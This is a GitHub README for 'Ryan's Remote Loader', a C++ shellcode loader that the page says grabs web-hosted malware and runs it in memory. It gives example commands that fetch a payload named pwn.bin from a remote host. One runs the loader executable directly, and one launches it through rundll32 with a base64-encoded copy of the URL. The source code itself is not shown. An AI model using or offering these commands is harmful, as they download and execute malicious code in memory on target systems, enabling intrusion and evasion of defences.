Skip to content

Latest commit

 

History

History
14 lines (9 loc) · 498 Bytes

README.md

File metadata and controls

14 lines (9 loc) · 498 Bytes

Ryan's Remote Loader

Custom shellcode loader written in C++. This will grab your web hosted malware and run it in memory.

This project is password protected at this time.

alt text

Examples:

RRL.exe will take the remote bin file as a parameter like: RRL.exe http://10.0.0.54/pwn.bin

This can also be run as a DLL using a base64 encoded parameter: rundll32.exe RRLDLL.dll,Driver aHR0cDovLzEwLjAuMC41NC9wd24uYmluCg==